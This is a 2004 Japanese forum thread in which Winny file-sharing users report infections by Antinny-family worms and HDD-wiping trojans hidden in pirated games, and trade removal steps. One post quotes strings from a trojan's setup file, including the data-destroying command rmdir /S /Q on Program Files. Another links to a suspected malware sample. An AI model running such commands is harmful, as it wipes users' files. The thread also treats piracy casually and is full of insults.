我々はこの三人の日本への入国を許さない。

【成田空港に生卵をぶつけに行くオフ】

488 :[名無し]さん(bin+cue).rar:04/04/11 04:57 ID:bMWcqXXD
新種のウイルスだとおもう。
かきこみやっとだが
うpフォルダ生成
そこにファイルをかってに生成し
うpほるだー、ダウンホルダーの削除、名称変更ができなくなる。
処置無し
だれかたすけてね。
感染はダウンしたフォルダー開いたら中身に入っていた
同名のふぉるだクリックで感染
すげーねむいーー

489 :[名無し]さん(bin+cue).rar:04/04/11 05:04 ID:bMWcqXXD
画像ができててそこにめがねをかけた男の顔がうつってる
だれかわかったらおしえてね。
あまりにねむいからねる
おねがいしまう

490 :[名無し]さん(bin+cue).rar:04/04/11 05:05 ID:ScMOmkwP
σ(゚∀゚ )オレオレ!!

491 :[名無し]さん(bin+cue).rar:04/04/11 05:23 ID:aDN+KoC0
フォルダーAの中に
→分割ファイル4個くらい
→結合batファイル
→フォルダーB

フォルダーBの中に
→jpgファイル10枚くらい
→jpgの拡張子にしたファイル(メモ帳で開いたら、罠の文字が入ってた)

jpg画像を見てから、jpgの拡張子にしたファイルをクリックすると
結合batファイルを実行→分割ファイル結合してるようだが、
結合後にフォルダー上から消えた

なんか、ここで書かれてるキンタマウィルスに似てるのを、
ロダからDLして実行してしまったようだ。
batファイルの中身は確認したけど、結合後のファイルが
いきなり実行されるとは、思わなかった
うかつだった

492 :[名無し]さん(bin+cue).rar:04/04/11 06:10 ID:RZHxJ+IZ
このスレにはスクリ-ンショットばら撒かれていそうな連中ばかりだね。

まずは>>1から嫁

質問はそれからだ。

493 :[名無し]さん(bin+cue).rar:04/04/11 06:22 ID:86iYKKxV
スクリーンショットだけならともかく、ファイル詰め合わせも流れているだろな

ウイルスというか、自己繁殖しないならワームなのだが、
名前がわかったところで、どうにもならん。しかも、連日のように亜種が
登場している現状では、各ワクチンツールで引っかからないものも多い。

怪しい動きをしたら、しのご言ってないで、さっさとデータだけでも
バックアップして、HDDフォーマット→OS再インスコしる!

一度、ny上に流れたものは、あきらめてガクブルしてください。

494 :[名無し]さん(bin+cue).rar:04/04/11 06:45 ID:rN444r7e
                | ̄``''- 、
                |      `゙''ー- 、  ________
                |    ,. -‐ ''´ ̄ ̄`ヽ、_        /
                |, - '´ ̄              `ヽ、     /
              /               `ヽ、ヽ   /
             _/                    ヽヽ/
           / / /   /  /  /            ヽハ
          く  / /!   |   〃 _/__ l|   | |   |  |  | | ||ヽ
           \l// / |  /|'´ ∧  ||   | |ー、||  |  | l | ヽ
            /ハ/ |  | ヽ/ ヽ | ヽ  | || /|ヽ/!  |/ | ヽ
            / |  ||ヽ { ,r===、   \| _!V |// //  .!   |
            | ||   |l |ヽ!'´ ̄`゙   ,  ==ミ、 /イ川  |─┘
            | ハ||  || | """ ┌---┐  `  / //  |
            V !ヽ ト! ヽ、    |     !    / //| /
               ヽ! \ハ` 、 ヽ、__ノ    ,.イ/ // | /
    ┌/)/)/)/)/)/)/)/)/)/)lー/ ` ー‐┬ '´ レ//l/ |/
    |(/(/(/(/(/(/(/(/(/(/│||      |\  〃
  r'´ ̄ヽ.              | | ト    /    \
  /  ̄`ア             | | |  ⌒/     入
  〉  ̄二) 知ってるが    | | |  /     // ヽ
 〈!   ,. -'                | | ヽ∠-----', '´    ',
  | \| |   .お前の態度が   | |<二Z二 ̄  /     ',
  |   | |               _r'---|  [ ``ヽ、      ',
  |   | |   気に入らない >-、__    [    ヽ      !
  \.| l.              ヽ、      [     ヽ    |
    ヽ|              \    r'     ヽ、    |


495 :[名無し]さん(bin+cue).rar:04/04/11 09:04 ID:ClfhcqVK
[18禁ゲーム] [040402] CHAIN TRAP〜復讐の淫罠〜 (ccd).rar

わ〜い!
たった今、これをデーモンツールでマウントして
HDのキャッシュ100G以上消されちゃった〜 
ご丁寧に『氏ね』なんて温かいお言葉まで同梱されてたよ。
(ノ ̄□ ̄)ノ ┫:・’

これまでにAntinnyは何度かブロックしてたもんで、
バスター2004を過信しすぎた。
バスターじゃbug.exeを検知しないんだね・・・
修行しなおしてきます。


496 :[名無し]さん(bin+cue).rar:04/04/11 09:25 ID:eASnEBEK
>>495
修行して来る前にオートランは切れと(ry

497 :[名無し]さん(bin+cue).rar:04/04/11 09:55 ID:JlUoCJQ1
Final Dat@使う前にデフラグってするべきなの?
なんかスキャン完了時間が凄いことになってんだけど。

498 :[名無し]さん(bin+cue).rar:04/04/11 10:01 ID:fpi1j9ru


     /■\
    ((´∀`;∩))
    (つ  丿
    ( ( ヽノ
'''''''''''''''''``````''''''''''''''''''     


      /■\
     ( ゚∀゚ ∩)
     (つ  丿
      ( ヽノ
'''''''''''''''''``````''''''''''''''''''

499 :[名無し]さん(bin+cue).rar:04/04/11 10:34 ID:3I1d/TcR
おにぎりさん
コンニチハ(゚∀゚)

500 :[名無し]さん(bin+cue).rar:04/04/11 12:09 ID:0p5mwAgV
500ゲットズサ━━━━⊂(゚Д゚⊂⌒`つ≡≡≡━━━━!!

501 :491:04/04/11 12:23 ID:aDN+KoC0
現状
プライマリ接続 HDD1 →パーティションで4分割 OSはその中の1個
セカンダリ接続 HDD2 →パーティションなし

HDDを、新規に買ってきて、そこにOS入れなおして、
HDD1をセンカンダリ接続して覗いて
データー移動すれば大丈夫なんかなー
とりあえずHDD1は、取り外してたけど、気力が出ないよー



502 :[名無し]さん(bin+cue).rar:04/04/11 12:39 ID:86iYKKxV
>>501
その場合、HDD1、HDD2ともに、バイナリは汚染された可能性が高い
しかも、データが汚染されていないという確証も無いわけだが...

覗くときに、うっかり踏むこともありそうだな
OS入れなおすときにも、オンラインで更新するとブラスター感染の
可能性もあるし。あーきーらーめーれー!




503 :491:04/04/11 13:11 ID:aDN+KoC0
>>502
確かに、データーが、汚染されてないとゆう保証もないね
データーは、落ち着いてから救出できると信じて
新規HDDのみで、セティングまで頑張ってみます。
明日の朝までに仕事出来る状態まで戻せるかなー


504 :[名無し]さん(bin+cue).rar:04/04/11 13:28 ID:J/Blglaf
仕事用PCなのかよ!!

505 :[名無し]さん(bin+cue).rar:04/04/11 14:55 ID:s31d/sbU

こういうソフト使ってる奴って半端な知識の奴が殆どだから解決できないんだね
大変そう
助けてやりたいんだけど

まずお前らのユーザネームを晒せや

506 :[名無し]さん(bin+cue).rar:04/04/11 15:02 ID:BOy+fo4+
C:\Documents and Settings\ユーザ名\Local Settings\Temp
この中のファイルを消す(とりうあえず全部でいいや)
このフォルダ内のウイルスファイルが生成されるたびAVGでも反応する
Winnyのファイルを全部消す(厳密にDownは削除しなくてもいいのだが)
次はレジストリの修正に進むぞカスども
「ファイル名を指定して実行」よりregeditを打ち込む
ただのメモ帳が立ち上がるとアウト

507 :[名無し]さん(bin+cue).rar:04/04/11 15:03 ID:BOy+fo4+
「REGEDIT.EXEとREGEDT32.EXEがNOTEPAD.EXEで置換えられた時の復活方法(2K/XP) 」

サービスパックを当てていれば、WindowsフォルダServicePackFiles\i386にREGEDIT.EXEが
残っているからそれを実行して「キンタマ」が自動実行しないようにする
リブートしてセーフモードで立ち上げて、
%WINDIR%\system32\DLLCACHEにあるREGEDIT.EXE, REGEDT32.EXE名のNOTEPAD.EXEを
削除する(1981年の日付になっているかと思われ)
先の%WINDIR%\ServicePackFiles\i386からREGEDIT.EXEとREGEDT32.EXEを上書きして復活汁
(間違えて移動してしまわないように)

次行くぞカスども

508 :[名無し]さん(bin+cue).rar:04/04/11 15:07 ID:BOy+fo4+
あーやっぱやめた。
厨房スクショ見たいからね
続きは自分で探せや
どうしてもというなら俺のケツを舐めろ
ノートン使ってもキリがないぞ

ちなみに偽造exeは複数あるからな

509 :[名無し]さん(bin+cue).rar:04/04/11 15:10 ID:Qa2M+sJ8
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.html

このページのレジストリの値を削除するところ、これではまた立ち上がるっつーのw

510 :[名無し]さん(bin+cue).rar:04/04/11 15:20 ID:J55Ep7Qq
うわわ UPフォルダが生成されて、その中に落としたファイルのコピーと9KBのメガネ男の
jpg画像が 多分488さんと同種と思われ。対処法ご指導願います




511 :510:04/04/11 16:02 ID:J55Ep7Qq
取り乱して申し訳ない どうやら元祖キンタマっぽい 
取り敢えず回線切って首に巻いてきまつ

512 :[名無し]さん(bin+cue).rar:04/04/11 16:14 ID:86iYKKxV
キンタマじゃなくて、ぬるぽ

513 :[名無し]さん(bin+cue).rar:04/04/11 17:01 ID:izy3SA8R
706 名前:捏造報告@ ◆vdi10LFLzU  [sage] 投稿日:04/04/10 11:50 ID:xlwDN5Tp
ちょっと面白かったんで報告
【18禁ゲーム】 (040409) スク×スク Disc01[bin+cue+rr3%].rar 700,347,310 8b0e00854264bbe669f32c04498548ce
【18禁ゲーム】 (040409) スク×スク Disc02[bin+cue+rr3%].rar 195,234,536 29eeb1bebb9739fc8dc71c192e729906

上記のDisc02を少し落とし強制変換して、壊れたbinファイルをマウントしてSetup.exeをバイナリエディタで
覗いてみたら下記の文字列が(一部抜粋)

君、違法にファイルをやり取りしているね!それ、犯罪だよ。一回、痛い目に遭った方が良いかもね!
君が違法にGETしたファイル全部消してあげる!そうすれば、君は無罪だ。
残念だけど、君を救う方法はこれしかない。耐えるんだ!
怪詐' ACCSの皆さんも大変困っています。ゲーム会社もかなり困っています エッチなゲームなんかしないで、現実の女性と付き合おうよ♪
左 rmdir /S /Q "C:\Program Files" ・これ以上、システムを破壊しますか?
YesもしくはNOを押して下さい... pause 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞錘c念でした。もう破壊しています。

んでSetup.iniには以下の文章が

うぐぅ、違法ファイルのやり取りは法律で禁止されているよ。

以上HDD消去トロイ入りです、本来は捏造報告しないけど今回のは面白かったので特別にしてみました
んでは


514 :510:04/04/11 17:13 ID:J55Ep7Qq
>>512
そうそれ win.iniにぬるぽ発見
取り敢えず何とかなりそうなんでこの辺で失敬。

515 :[名無し]さん(bin+cue).rar:04/04/11 18:06 ID:OZWU/GGe

キンタマとかキンタマの亜種でもトレンドマイクロのオンラインウイルススキャンとかで発見できるの?


516 :[名無し]さん(bin+cue).rar:04/04/11 18:08 ID:5L4TZQNe
>>515
発見できるよ。

517 :[名無し]さん(bin+cue).rar:04/04/11 18:09 ID:0mWikFKU
>>515
こうゆう質問はもうネタとしかいいようがないよな…

518 :[名無し]さん(bin+cue).rar:04/04/11 18:24 ID:vXFqLw5Q
  ┏┳┳┓              ┏┳┳┓
┏┫┃┃┃ 厨房・無知は. ┃┃┃┣┓
┃┃┃┃┣┓ ここまで   ┏┫┃┃┃┃
┃      ┃┃┏━━━┓┃┃      ┃
┃ 調べる. ┣┫ ・∀・ ┣┫  努力を┃
┗━━━━┛┗┳━┳┛┗━━━━┛
            ┏┻┓┃
        ┏━┛  ┣┻┓
        ┗━━━┫  ┗━┓
                ┗━━━┛

519 :[名無し]さん(bin+cue).rar:04/04/11 19:00 ID:B9ByXMYX
>>517
おまえの言葉の使い方もネタとしかいいようがないよな…

…ネタだよな本当に。

520 :[名無し]さん(bin+cue).rar:04/04/11 19:10 ID:RZHxJ+IZ
  ┏┳┳┓              ┏┳┳┓
┏┫┃┃┃ 厨房・無知は. ┃┃┃┣┓
┃┃┃┃┣┓ ここまで   ┏┫┃┃┃┃
┃      ┃┃┏━━━┓┃┃      ┃
┃ 調べる. ┣┫ ・∀・ ┣┫  ぬるぽ┃
┗━━━━┛┗┳━┳┛┗━━━━┛
            ┏┻┓┃
        ┏━┛  ┣┻┓
        ┗━━━┫  ┗━┓
                ┗━━━┛


521 :510:04/04/11 19:25 ID:J55Ep7Qq
pandaでスキャンしたら、感染ファイルその数45…んで全部antinny Aだったよ
疲労甚だしい

522 :495:04/04/11 20:21 ID:ELSL25xc
いったん電源切って、さっきまた起動させたら
再びbug.exeが起動しますた・・・・
(ノTДT)ノ ┫:・’


システム領域にあったexe自体は削除したというのに、なぜだぁぁぁ!
今度は別なHDにも手を出されて、20Gぐらい持ってかれた・・・・・

523 :[名無し]さん(bin+cue).rar:04/04/11 20:25 ID:RwXk7ivy
ΣΣ(゚Д゚;) エエェッ!?
(((( ;゚Д゚)))ガクガクブルブル

524 :460:04/04/11 20:54 ID:RR4Lef3n
WORM_ANTINNY.Dに感染したって報告ほとんどないね
もしかして俺って凄い珍しいものを捕獲したのかな?

525 :[名無し]さん(bin+cue).rar:04/04/11 21:06 ID:pR6yIg5a
bug.exeって76氏の作ったプログラムのことだと思ってたけど、違うのか?
初期のエロゲAutorunを狙ったのには確かにbugとドラクエのセーブ消滅テーマが同梱されてたが……

>>495の言ってるやつはbug.exeという名前のWhiterなんだろうか。

526 :[名無し]さん(bin+cue).rar:04/04/11 21:11 ID:R1EFHI7w
>>522
時代の最先端をいった。
俺も気をつけよう・・・。

527 :[名無し]さん(bin+cue).rar:04/04/11 21:19 ID:86iYKKxV
bug.exeというJokesoftの機能だけを抽出した変種ワームは、
MBR(ますたーぶーとれこーど)に感染するのかも

ブート領域をチェックできるワクチンにしなはれ。

528 :[名無し]さん(bin+cue).rar:04/04/11 21:56 ID:dXnO9UBD
勝手に修正しちゃう。

名前 Antinny.ms(仮)
    Bの亜種? ノートンではトロイとして検出可能 バスター未対応
サイズ 1.26MB 開発名 SilentToker Delphi製

症状
・Windowsフォルダにsvchost.exeを作成。
 無い場合もあり。Systemフォルダのsvchost.exeは問題なし。
・UpFolder.txtに名前BBSでダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。
 感染の際にアイコンを自ら変更する模様。
・アンチウイルスソフト(ノートン、バスター)の自動実行を無効に。
・毎月第一月曜日に発動。なにやってんのかは不明。
・親と子があり、いずれもSystemフォルダに作成される。
・子はms???.exe(248k)。親はms???.exe(282k)
 子は消しても再起動すると親が作成する。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可
・親はサービスに登録される。
・親子ともにファイルバージョン5.1.3125.1093、製品バージョン6.00.1800.1007。
・親と子はノートンでトロイとして検出される。本体はスルー。

対策
1. 親のファイル名が含まれるレジストリキーを削除。
  Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
  Win9X、MEの場合は不明
2. セーフモードで親子ともどもファイル削除。
3. HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
  HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4. NyのUpフォルダ設定を元に戻す。
5. ノートンやバスター等のワクチンソフトを再インストール。
  バスターはPCCTool.exeを使えば再インスコせずに済む。

529 :[名無し]さん(bin+cue).rar:04/04/11 22:26 ID:izy3SA8R
トロイとウィルスの差って何だよ

530 :[名無し]さん(bin+cue).rar:04/04/11 22:28 ID:izy3SA8R
自分で調べます。スミマセンでした。

531 :[名無し]さん(bin+cue).rar:04/04/11 23:12 ID:+DKzy0Dw
感染した人ってみんな情報送信されて逮捕されちゃうの!?

532 :[名無し]さん(bin+cue).rar:04/04/11 23:47 ID:ED7QxsDa
>>433落としてみたけど、よくあるネコの面白い映像じゃないかよ ┐(´ー`)┌


533 :[名無し]さん(bin+cue).rar:04/04/11 23:51 ID:DusgoG4m
>>531
だれも逮捕されてないだろ
安心して感染しろ

534 :[名無し]さん(bin+cue).rar:04/04/12 00:06 ID:rMmxwgB0
Winnyを起動したら、「ログ情報」のところで
「BBSポート待ち受け開始を延々とやってるんですが、
何かのウィルスでしょうか???

535 :[名無し]さん(bin+cue).rar:04/04/12 00:07 ID:k80/IOoV
物凄く雑魚な質問で申し訳ないんだが
圧縮ファイルの中にウィルスがある時ってスキャンに引っかかる?
圧縮ファイル自体はウィルスじゃなくても

536 :[名無し]さん(bin+cue).rar:04/04/12 00:17 ID:nn9MQ8wn
すまん。
AVG使用しているんだけど、キンタマ対策になってる?

537 :[名無し]さん(bin+cue).rar:04/04/12 00:28 ID:26gm4sft
>>535
ソフトによるよ。
設定に「圧縮ファイルをスキャンするかどうか」の項目があるかもしれないし無いかもしれない。

>>536
なってる。






と言われて安心する人にとっては対策になってない。
そう言われても安心しない人にとっては対策の一手段くらいにはなってる。

538 :[名無し]さん(bin+cue).rar:04/04/12 00:30 ID:Gx8pN0O9
>>536
テンプレに書いてあることを守る。
それが一番の対策。
どんなソフトいれてもテンプレ守れないバカは感染するよ。

539 :[名無し]さん(bin+cue).rar:04/04/12 00:32 ID:nn9MQ8wn
あ、すいません。

キンタマとぬるぽって別物ですか?
キンタマ対策してるってことは一応後者にも対応してるのかな?

540 :535:04/04/12 00:34 ID:k80/IOoV
>>537
なんと
トレンドマイクロのオンラインスキャンでやってるんだけど、
圧縮ファイルの横にアスタリクスに囲まれて、中のウィルスファイル名が書かれてるんだよね
という事は、中のウィルスに反応したって考えていいのかな

何はともあれ、回答サンクス

541 :[名無し]さん(bin+cue).rar:04/04/12 00:36 ID:knJ83YK9
起動のたびに、Winnyフォルダの中にupってフォルダが作られて
【アルバム】*******.exeってファイルが作成されます(*******は毎回違います)
駆除したいのですが方法がわかりません
教えてください

542 :[名無し]さん(bin+cue).rar:04/04/12 00:46 ID:PFytcKFn
>>527
BIOSの設定でMBRへの書き込みを禁止できるものもあるから
それで予防する方法もあるね。

543 :[名無し]さん(bin+cue).rar:04/04/12 01:01 ID:/Tio/JYC
>>531
警官が逮捕されてないだろ。

544 :[名無し]さん(bin+cue).rar:04/04/12 01:02 ID:n+/J8P13
>>541
ほらよ!
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=a&virus=ANTINNY&alt=ANTINNY&key=ANTINNY&payload=&type=&day=&month=&year=&wkday=


545 :[名無し]さん(bin+cue).rar:04/04/12 01:05 ID:6kQOf7UG
>>531
捜査本部は設置されてる。
だから逮捕ってわけじゃないけど、一応記録はとってる。

546 :[名無し]さん(bin+cue).rar:04/04/12 01:32 ID:6fP29M9m
>>541
駆除できねぇ

547 :[名無し]さん(bin+cue).rar:04/04/12 02:30 ID:mQnq+Zri
哀れなエロゲヲタの典型的末路
>>495>>522

既に対処できる俺にとっては、ここはまるで厨房が通院する

「厨房病院」

と命名したい

つける薬は・・・・無いw

548 :[名無し]さん(bin+cue).rar:04/04/12 02:39 ID:LpUA2fKr
何度も発病する人が通う病院はココですか?

549 :[名無し]さん(bin+cue).rar:04/04/12 02:46 ID:tQvUQci3
ほんっとに腐った奴のスクリーンショットとか
まれにあるな
エロゲーっぽいアイコンにアニヲタっぽい壁紙で、
仲間とのチャットでは、「彼女は常に複数w」とかぬかしてんのよ

550 :[名無し]さん(bin+cue).rar:04/04/12 03:12 ID:ijKfKlmj
>>549
あ、それ俺

551 :[名無し]さん(bin+cue).rar:04/04/12 03:31 ID:4/GNC22i
>>549
☑ エロゲーっぽいアイコン
☑ アニヲタっぽい壁紙
☐「彼女は常に複数w」とかぬかす

552 :[名無し]さん(bin+cue).rar:04/04/12 03:44 ID:/nE1lE5Z
エロゲーっぽいアイコンにアニヲタっぽい壁紙で、ハードボイルド系

もももももうだめぽoooooh!

553 :[名無し]さん(bin+cue).rar:04/04/12 03:48 ID:ohIe+O7+
彼女の代わりに彼氏だったら良いのか?

554 :[名無し]さん(bin+cue).rar:04/04/12 03:52 ID:rTo+KCSu

【不幸のレス】
このレスを見た人間は四日以内に死にます。
※あなたに訪れる死を回避する方法が
一つだけ/⌒ヽあります。
それは / ´_ゝ`)5つの板のスレに十分以内に
これを |    / コピペすることです。
      | /| | 
     // | |  
     U .U  

555 :[名無し]さん(bin+cue).rar:04/04/12 06:14 ID:beSzwD0P
>>554
今夜が峠と言われた曾祖母が
このスレのおかげで少し寿命が伸びました

556 :[名無し]さん(bin+cue).rar:04/04/12 06:43 ID:WoxdPfl3
い〜はなしだなぁ〜

557 :[名無し]さん(bin+cue).rar:04/04/12 08:08 ID:m1bkfYxr
bag.exeってどんなの?

558 :[名無し]さん(bin+cue).rar:04/04/12 08:11 ID:PwJn3Z00
なあ…なんか、nyを起動するたび、ランダムな文字列を複数組み合わせた
636Kbのexeファイルがwinnyフォルダ内のUpフォルダに生成されるのだが、
なんとかならんものか

好奇心で変なexeをクリックした俺が悪いんだが・・・

559 :[名無し]さん(bin+cue).rar:04/04/12 08:14 ID:A+roOkvo
>>558
ぬるぽ

560 :[名無し]さん(bin+cue).rar:04/04/12 09:40 ID:U2JP3oYM
Antinny.msにやられた。。。
>>528のやつで完全に大丈夫なのかな?

561 :[名無し]さん(bin+cue).rar:04/04/12 10:02 ID:TYINVTmv
>558が自動生成してるのは、ぬるぽ
これもmsのように、親プロセスがどこかにあって、子プロセスの ぬるぽを生成
してるっぽい。

どんどん機能が複合化していて楽しいな。やぱーり、nyネットワークの崩壊を
狙うどこかの組織が系統だてて作成してるんだろな。

exeしか作れないという点では厨なのだが。
割れ厨房 まけるなWinny ここにあり

562 :[名無し]さん(bin+cue).rar:04/04/12 10:13 ID:yNI2X1Ne
>>561
【警報】Winnyを狙ったワーム・ウイルス情報 Part10

75 :[名無し]さん(bin+cue).rar :04/03/03 12:18 ID:aVDFPGvF
簡単なプログラムのアルバイト募集があったのでやってみたらウイルス作成だった。
もちろんその日にやめたけど。
業界の人も大変ですな。

563 :[名無し]さん(bin+cue).rar:04/04/12 10:13 ID:2e+XPmBB
>>549
そのスクリーンショットを壁紙にしろ。

564 :[名無し]さん(bin+cue).rar:04/04/12 10:14 ID:yNI2X1Ne
78 :[名無し]さん(bin+cue).rar :04/03/03 12:24 ID:aVDFPGvF
高収入だからアヤシイと思ったが案の定。
割に合うんだか合わないんだか。
おまいらに気を付けろとゆうのも可笑しいけど報告ですた。

565 :[名無し]さん(bin+cue).rar:04/04/12 10:23 ID:IS8SvIFs
>>560
だめぽ

566 :[名無し]さん(bin+cue).rar:04/04/12 10:29 ID:11XqB2Sk
>>549
ユーザーネームがアダルトゲームのキャラクターなやつも普通に居る

567 :[名無し]さん(bin+cue).rar:04/04/12 12:44 ID:EFWiGHZi
.folderの先には怪しげなexeがあって、.folder踏んだらIE起動して「サーバーが見つかりません」
で、今スキャン中。

upフォルダなし、Upfolder.txtにも登録なし、regeditも起動確認だが…
大丈夫か、俺!

568 :[名無し]さん(bin+cue).rar:04/04/12 13:16 ID:cFHUbwLw
>>567
自分も似たようなの踏んだよ。
とあるzipで固めてある音楽ファイルを解凍したら、目的のブツと
一緒に「----(このへん、忘れた).folder」っつーのが出現。
気になるのでうっかりダブルクリックしたけど、なんにも無かった。

これって一体…??

569 :[名無し]さん(bin+cue).rar:04/04/12 13:34 ID:b1EUZCrK
>>568
おまけを確認せずにいられなかったか・・・
アルバムに付いてくるのは結構あるのに

570 :[名無し]さん(bin+cue).rar:04/04/12 13:36 ID:qPQ3PoRi
やってしまいました。 なんとなくエロゲ落としてみてsetup.exeを実行しちまった。しばし待て見たいなDOS画面がでて待っていたがデスクトップのファイルがなくなって気づいた… 実行はとめたがこれは単体のプログラムなのだろうか。
他に怪しいところはなさそうなのだが…
誰か教えてくだされ

571 :[名無し]さん(bin+cue).rar:04/04/12 13:40 ID:qPQ3PoRi
↑自己レス Cドラのファイルが隠し以外あらかた消えちまった。 今復活を試みてるとこ

572 :[名無し]さん(bin+cue).rar:04/04/12 13:46 ID:1Avi6y4e
>>560
俺もやられた。
nodとバスターで検索してでなかったので安心してたのだが
winnyのUPフォルダを削除しても復活し、winnyを終了してもアクセスが止まらないうえ
バスターのオンラインスキャンにアクセスできなかったのでXP再インストール
したんだがこのウイルスは他に何をするの?キンタマみたいなことはするの?

573 :[名無し]さん(bin+cue).rar:04/04/12 13:54 ID:cFHUbwLw
>>569
そうなんです。
なにしろ、目的のファイル名じゃないフォルダと一緒にコレが出て
きてね。
解凍して出てきたフォルダは何故だか「お得情報」ってやつだった。
んで、例の.folderがくっついてました。
中身は本物だったけど、なんだよあのフォルダ名。
チクショウ。

574 :570:04/04/12 14:01 ID:qPQ3PoRi
どうみても(中身)怪しいのにどこのスキャンにも引っかからない 感染しないってことか? 
はぁ まぬけだ

575 :[名無し]さん(bin+cue).rar:04/04/12 14:16 ID:UbJZln4k
それはwhiterじゃないのか

576 :570:04/04/12 14:17 ID:qPQ3PoRi
なかみをうぷしてみました みてわかるもんでしょうか 
ttp://www.42ch.net/UploaderSmall/source/1081746959.txt
です 

577 :570:04/04/12 14:49 ID:qPQ3PoRi
whiterってレジストリに登録します? こちらではwhiterという記述がかくにんできませんでした

578 :[名無し]さん(bin+cue).rar:04/04/12 14:54 ID:TYINVTmv
>576
いきなりウイルスかもしれんファイルをtxtであげるな、ボォケ。タイーホされるぞ

中身は、よくわからんが、
ファイルは、WindowsのIE 6.0の実行ファイルに関係する文字列が入ってる

あと、おそらく ぬるぽ関係の文字列を付加するコードも入ってた
stream.c PATH **argv != _T('\0')
filename != _T('\0') spawnvpe.c .com .exe .bat .cmd .\ spawnve.c
後半は、上書き用かな

今までのデルファイ作成ものと同一かどうかの判断は下せないが、MS VC++で
組まれているっぽい(ライブラリコールが散見)

最後にこんな文字列、偽装用か C:\chikan\Debug\setup.pdb

579 :570:04/04/12 14:59 ID:qPQ3PoRi
で これはなんですか? マジで.…

580 :[名無し]さん(bin+cue).rar:04/04/12 15:10 ID:f55HxphU
どうってこたぁないに1票。

おまいが第一感染者でなければ、その辺うろついてるうちに
先に発病する奴が出るはず。
その時に対処すればOK

581 :[名無し]さん(bin+cue).rar:04/04/12 15:10 ID:TYINVTmv
判定としては、未知の(特定されて無い)ぬるぽ

動作に関しては、レジストリとかキャッシュとかなーんかいろんなとこから
抜いてきてるんだが、何にするつもりかわからん。逆アセなんかする気にならん

582 :[名無し]さん(bin+cue).rar:04/04/12 15:20 ID:F3uuVJIj
>>579
ダンプして見た所HDD消去プログラムと思われ
ただコードを追いかけた訳じゃないので、ウイルスの可能性も捨てきれないが
ただやたらと0x20が多いのが気になった、たぶん容量稼ぎだと思われ

583 :570:04/04/12 15:35 ID:qPQ3PoRi
総合するととりあえず様子を見ろということでしょうか 特に変なプログラムはしってないから一度再起動してみます
戻ってこれるのだろうか.…

584 :[名無し]さん(bin+cue).rar:04/04/12 15:51 ID:Jz8EayIV
Antinny.msにこちらも感染。
OS再インスコとデータ復旧がようやく終了。
ところで、
>・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。
> 感染の際にアイコンを自ら変更する模様。
これってアップとダウンどちらなんでしょうか?
ダウンフォルダがそのままとってあるので心配なのですが・・・

585 :[名無し]さん(bin+cue).rar:04/04/12 16:21 ID:26gm4sft
ウイルスがnyネットワーク崩壊を目的に作られたとか考えてる奴って……
まぁ人間の盾が減るのは確かだが、ny崩壊なんてとてもとても。

こんなのに引っかかるのは初心者・ネトラン者だけだろ。ふるいにかけるのが目的だと思われ。
あとは単純に楽しいよ。大勢が簡単に引っかかってくれるし、勝手に拡散してくれるし。


という考えの人間はもう少ないのか?

586 :[名無し]さん(bin+cue).rar:04/04/12 16:24 ID:A+roOkvo
>>584
ダウンフォルダのファイルの日付見ればわかるんでねーの?

587 :[名無し]さん(bin+cue).rar:04/04/12 16:28 ID:Jz8EayIV
>>586
あっそだね。サンクス。

>>585
愉快犯と嫌がらせを楽しめるのは、それを実行する当事者だけじゃない?
まあアングラがアングラじゃなくなりつつあるのは歯痒いが

588 :[名無し]さん(bin+cue).rar:04/04/12 16:30 ID:TL3oGamY
http://www.geocities.jp/anoresu/index.html
コピペ推奨!Winnyのクラスタワードまとめ(テスト版)

589 :[名無し]さん(bin+cue).rar:04/04/12 16:31 ID:qow0egdb
あるファイルを実行したら人の顔がでてきました。
感染した可能性大ですか?

590 :[名無し]さん(bin+cue).rar:04/04/12 16:38 ID:n7rIlS6L
アニメにまぎれたウイルスってないから今のとこよさそうだ。
変なプロセスもないしな。
怖いな、kんたま系は・・・・。
もっとネットワークについて勉強しようっと。

591 :[名無し]さん(bin+cue).rar:04/04/12 16:38 ID:mQPV2fRL
たぶん違う
ジョークソフト

592 :589:04/04/12 17:02 ID:qow0egdb
ありがとう

593 :[名無し]さん(bin+cue).rar:04/04/12 17:06 ID:MxuQ+VN4
>>585
>ウイルスがnyネットワーク崩壊を目的に作られたとか考えてる奴って……

こんなしょうもないもんに引っかかる初心者が自分を基準にして考えた妄想だよね。
引っかからない普通のユーザーはここで騒いだりしないから、引っかかった人たちは
自分たちがほんの一部の奇特な人たちだってことに気付かないのかもね。

594 :[名無し]さん(bin+cue).rar:04/04/12 17:07 ID:mQPV2fRL
むしろエクスプローラをデフォで使ってるような初心者な方には
リタイアしてもらった方が嬉しいかもしれない

595 :570:04/04/12 17:20 ID:qPQ3PoRi
まさか自分が引っかかるとはって思ってるよ 別に自信があったわけじゃないけど まめにバックアップとって無いから
いま手動でファイル復元中 数が多すぎてつかれてきたよ

596 :[名無し]さん(bin+cue).rar:04/04/12 17:42 ID:f55HxphU
ウィルス感染どころかウィルスに遭遇したことすらないんだけど・・・。
感染した人はnyの使い方からして間違ってるんじゃないの?

597 :[名無し]さん(bin+cue).rar:04/04/12 18:03 ID:yFaKlP3r
オマイラ、餌きたってのに食い付き悪いぞ


598 :[名無し]さん(bin+cue).rar:04/04/12 18:03 ID:VyAOWl7y
俺も一回しかないなぁ>遭遇

ノートン先生が怒って終わりましたが
そうじゃなくとも.txt.exeなんてさわるわけもなく

599 :[名無し]さん(bin+cue).rar:04/04/12 18:55 ID:n7rIlS6L
とにかく.exeと.folderと.mp3を気をつければいいんでしょ?
大丈V!!(古っ!!)

600 :[名無し]さん(bin+cue).rar:04/04/12 18:58 ID:FC2Ta5cs
AVGを使っている人へ。

適当なファイルの拡張子を.zip.batにすると…

601 :[名無し]さん(bin+cue).rar:04/04/12 19:03 ID:A9Vln/wa
登録拡張子非表示にしてるアホが多いんじゃねぇの?

602 :[名無し]さん(bin+cue).rar:04/04/12 19:10 ID:HgE5Zrb0
>>599
んなこたぁない。つーことでせいぜい一生怯えてダウソしてくれ。

